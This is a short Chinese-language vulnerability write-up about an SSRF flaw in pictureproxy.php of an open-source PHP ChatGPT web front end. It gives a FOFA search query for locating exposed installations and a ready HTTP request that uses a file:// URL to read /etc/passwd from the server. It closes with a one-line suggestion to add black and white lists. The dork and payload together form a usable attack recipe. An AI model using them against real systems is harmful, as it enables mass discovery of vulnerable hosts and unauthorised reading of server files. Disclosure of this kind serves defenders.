免责申明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
搜索语法
fofa
title="ChatGPT个人专用版"
漏洞描述
该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞
漏洞复现
payload
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
修复建议
修改源代码,进行黑白名单
